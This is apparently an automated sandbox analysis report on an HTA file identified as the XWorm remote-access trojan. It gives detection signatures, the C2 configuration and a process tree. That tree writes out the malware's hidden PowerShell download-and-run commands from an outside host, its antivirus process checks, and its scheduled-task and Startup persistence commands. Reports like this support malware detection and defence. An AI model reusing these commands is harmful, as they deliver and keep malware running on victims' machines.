Windows Analysis Report
c2.hta

Overview

General Information

Sample name: c2.hta
Analysis ID: 1573971
MD5: 3b3967433fe77e5b709e469d9635d707
SHA1: 21dfe527565c8d9c766458a48634b2d633e59076
SHA256: bb4f26feac9120fd5104e555331bc9fbbab35a1b2874d61c241397dad73284a8
Tags: hta, user-abuse_ch

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Drops large PE files
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: PowerShell Web Download
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7864 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 8132 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 8184 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • Acrobat.exe (PID: 7692 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 2396 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 6720 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2052 --field-trial-handle=1648,i,6467156151985402777,10202988688681388531,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • powershell.exe (PID: 964 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • powershell.exe (PID: 8412 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • msword.exe (PID: 8672 cmdline: msword.exe MD5: C744E054E4EF01832BBF43B81D397B61)
        • cmd.exe (PID: 8932 cmdline: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 8984 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 8992 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 9028 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 9036 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 9076 cmdline: cmd /c md 220239 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • findstr.exe (PID: 9092 cmdline: findstr /V "DimPieLilHot" Statistical MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 9108 cmdline: cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Carter.pif (PID: 9124 cmdline: Carter.pif F MD5: 18CE19B57F43CE0A5AF149C96AECC685)
            • cmd.exe (PID: 9160 cmdline: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 9168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 9208 cmdline: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
            • cmd.exe (PID: 5032 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • RegAsm.exe (PID: 8756 cmdline: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • choice.exe (PID: 9140 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • cmd.exe (PID: 8820 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8904 cmdline: timeout /t 90 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • wscript.exe (PID: 8252 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • DanielPulse.scr (PID: 8324 cmdline: "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • wscript.exe (PID: 1372 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
{"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Source | Rule | Description | Author | Strings
0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xa570:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xa60d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xa722:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x9f4c:$cnc4: POST / HTTP/1.1
0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0000001D.00000003.3345732734.0000000003871000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x8e70:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x13ce0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8f0d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x13d7d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x9022:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x13e92:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x884c:$cnc4: POST / HTTP/1.1
  • 0x136bc:$cnc4: POST / HTTP/1.1
00000029.00000002.3850092334.0000000000D52000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |

Source | Rule | Description | Author | Strings
29.3.Carter.pif.38bceb0.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
29.3.Carter.pif.38bceb0.1.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x8218:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x82b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x83ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7bf4:$cnc4: POST / HTTP/1.1
29.3.Carter.pif.38bceb0.0.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
29.3.Carter.pif.38bceb0.0.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
29.3.Carter.pif.38bceb0.0.raw.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xa018:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xa0b5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xa1ca:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x99f4:$cnc4: POST / HTTP/1.1

              System Summary

Source: Process started; Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems); Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 9124, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 8756, ProcessName: RegAsm.exe
Source: File created; Author: frack113, Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7864, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\c[1].bat
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 9160, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ProcessId: 9208, ProcessName: schtasks.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8132, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 8184, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7864, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ProcessId: 8132, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8132, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 8184, ProcessName: powershell.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", ProcessId: 8252, ProcessName: wscript.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: Carter.pif F, CommandLine: Carter.pif F, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8932, ParentProcessName: cmd.exe, ProcessCommandLine: Carter.pif F, ProcessId: 9124, ProcessName: Carter.pif
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ParentCommandLine: Carter.pif F, ParentImage: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ParentProcessId: 9124, ParentProcessName: Carter.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe, ProcessId: 8756, ProcessName: RegAsm.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8132, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 8184, ProcessName: powershell.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 9124, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: msword.exe, ParentImage: C:\Users\user\AppData\Local\Temp\msword\msword.exe, ParentProcessId: 8672, ParentProcessName: msword.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ProcessId: 8932, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 9160, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F, ProcessId: 9208, ProcessName: schtasks.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\220239\Carter.pif, ProcessId: 9124, TargetFilename: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8132, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 8184, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js", ProcessId: 8252, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8132, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 8184, ProcessName: powershell.exe

              Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5032, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

              HIPS / PFW / Operating System Protection Evasion

